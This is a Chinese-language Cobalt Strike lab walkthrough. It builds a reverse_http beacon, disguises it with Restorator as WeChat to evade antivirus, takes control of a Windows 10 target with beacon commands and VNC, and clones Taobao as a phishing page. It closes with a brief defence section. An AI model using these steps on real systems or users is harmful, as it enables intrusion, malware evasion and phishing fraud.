CobaltStrike完整攻击详解

前置合规声明

本文所有操作仅在个人授权Windows10靶机、私有局域网环境内完成，仅供网络安全人员学习攻防原理、制定防御策略。
根据《中华人民共和国网络安全法》《中华人民共和国刑法》，未经授权对任何公网/内网设备、网站进行入侵、控制、钓鱼诈骗，均属于违法犯罪行为，本人与本文不承担任何非法使用造成的一切后果。

1. 环境介绍

1.1 实验环境

攻击机：Kali Linux 2025（搭载CobaltStrike 4.7）
受害靶机：Windows 10 x64 （测试授权靶场环境）
伪装工具：Restorator 2018（EXE图标、版本信息篡改免杀）
攻击机IP： 192.168.154.128
通信端口：木马监听 54321、钓鱼网站 1244

1.2 攻击流程

1.Kali启动CS服务端 → 配置54321端口监听器 → 生成原生CS木马 → Restorator图标和版本信息伪装免杀 → 木马投递靶机上线 → 会话交互 → 远程桌面控制

2.1244端口搭建淘宝钓鱼站

2. Kali部署CobaltStrike

2.1 关闭占用端口服务

为后续80端口钓鱼服务正常运行，关闭本地占用端口服务：

# 关闭apache服务 sudo systemctl stop apache2 sudo systemctl disable apache2 # 关闭nginx服务 sudo systemctl stop nginx sudo systemctl disable nginx # 赋予Java绑定低端口权限 sudo setcap 'cap_net_bind_service=+ep' /usr/bin/java

2.2 启动CS服务端与客户端

# 进入CS存放目录 cd /home/kali/Desktop/cs4.7-cn # 启动TeamServer服务端，IP+自定义密码 sudo ./teamserver 192.168.154.128 kali # 启动客户端 ./cobaltstrike

客户端填写服务端IP、密码，即可成功连接CS团队服务器

3. 配置端口监听器&生成木马

3.1 创建监听器

1. 顶部菜单栏：监听器 → 添加
2. 参数配置：- 载荷： windows/beacon_http/reverse_http
- 回连IP： 192.168.154.128
- 回连端口： 54321
- 自定义名称：Kali2
3. 保存配置，监听器创建完成

3.2 生成恶意木马

1. 顶部菜单栏：攻击 → 生成 → Windows可执行程序
2. 配置参数：- 选择监听器：Kali
- 架构：x64
- 格式：Windows EXE
- 输出文件名：artifact.exe

原生CS生成的木马特征极其明显，默认图标空白、无任何软件版本信息，极易被杀毒软件查杀，所以需要进一步伪装免杀。

4. Restorator软件伪装免杀

原生CS木马特征显著，我们使用 Restorator 对木马进行深度伪装，替换正常软件图标、填充官方版本信息，欺骗Windows系统与杀毒软件，降低查杀概率。

4.1 Restorator工具介绍

Restorator 是一款经典的 PE资源编辑工具，可以修改EXE程序的：

- 程序图标（ICO）
- 产品名称、公司版权
- 版本号、文件描述
- 程序资源信息

让木马从“空白未知程序”伪装成“正规官方软件”。

4.2 免杀伪装详细步骤

1. 准备正常正规软件源文件
选取一款大众正规软件（作者选的是企业微信等）的原版EXE，用于提取正版图标和版本信息。
2. 拖入原生木马 artifact.exe 到 Restorator
软件自动解析PE程序所有资源。
3. 替换程序图标

- 左侧选择 Icon 图标资源
- 删除原有空白默认图标
- 导入从正规软件提取的 高清ICO图标
- 替换所有尺寸图标（1616、3232、64*64）

4. 修改版本信息（核心免杀点）
找到 Version 版本信息 栏目，手动填充正规软件真实信息：

- 产品名称
- 公司名称
- 文件版本
- 产品版本
- 版权信息
- 文件描述

填充完成后，木马在系统属性中和正常商用软件完全一致，无任何可疑空白信息。

5. 保存生成伪装木马
文件 → 另存为 Wechat.exe
至此，带正规图标、完整版本信息的伪装木马制作完成。

5. 靶机上线 和 会话交互

5.1 靶机上线

将 Restorator 处理后的伪装木马 Wechat.exe 上传至Windows10靶机并运行。
因为图标、版本信息全部伪装为正常软件，用户无感知，双击运行即可回连攻击机。

CS控制台成功捕获靶机上线会话，获取完全控制权限。

5.2 常用CS Beacon指令

# 获取当前登录用户 getuid # 获取靶机完整系统信息 sysinfo # 查看靶机所有运行进程 ps # 执行Windows系统命令 shell ipconfig shell whoami

6. 靶机远程桌面控制

右键目标会话，在菜单里选择浏览探测，之后点击VNC桌面管理，从而实现对目标主机的图形化远程控制，包括查看屏幕、操作鼠标键盘。

7. 1244端口淘宝钓鱼网站

7.1 功能说明

利用CS自带的站点管理的站点克隆功能，在1244 端口搭建高仿淘宝页面，用于钓鱼测试与安全研究。

7.2 打开站点管理

在 Cobalt Strike 菜单栏点击站点管理→网站克隆，打开克隆配置窗口

7.3 Clone Site 克隆淘宝页面

1. 点击：站点管理 → 站点克隆
2. 参数配置：- 克隆 URL： https://www.taobao.com
- 本地 Host： 192.168.154.128
- 本地 端口： 1244
3. 点击「克隆」按钮，CS会自动生成一个和淘宝外观一模一样的“钓鱼网站”。

7.4 访问钓鱼页面

靶机浏览器访问：http://192.168.154.128 :1244页面与官方淘宝几乎完全一致。

8. 实验常见问题解决

8.1 54321端口无法上线

- 靶机、攻击机网络互通
- 防火墙未拦截54321端口
- 监听器端口与木马端口一致

8.2 Restorator修改后木马打不开

- 保存时选择「完全保存资源」
- 不要修改PE头部参数，仅修改图标与版本

9. 企业防御方案

9.1 终端防御

- 查杀无数字签名、异常资源篡改EXE文件
- 监控陌生程序54321等非常规端口外联
- 校验程序图标、版本信息是否匹配官方白名单

9.2 网络防御

- 拦截IP地址形式的电商访问
- 监测CS beacon心跳流量特征
- 封禁恶意80端口仿冒站点

9.3 人员安全

- 不随意运行来路不明“正规图标”软件
- 网购仅访问官方HTTPS域名

10. 总结

本文完整演示了CS 54321端口木马生成 → Restorator图标+版本深度伪装免杀 → Win10靶机上线控制 → 远程桌面 和1234端口淘宝网站克隆钓鱼的完整红队攻击。

现在黑产木马普遍不再使用默认裸木马，都会通过资源修改工具伪装成正常软件。安全从业者必须熟悉此类伪装手段，才能更好地检测、查杀、防御伪装型恶意程序。

再次提醒：本实验仅限授权安全研究，严禁非法入侵与钓鱼诈骗！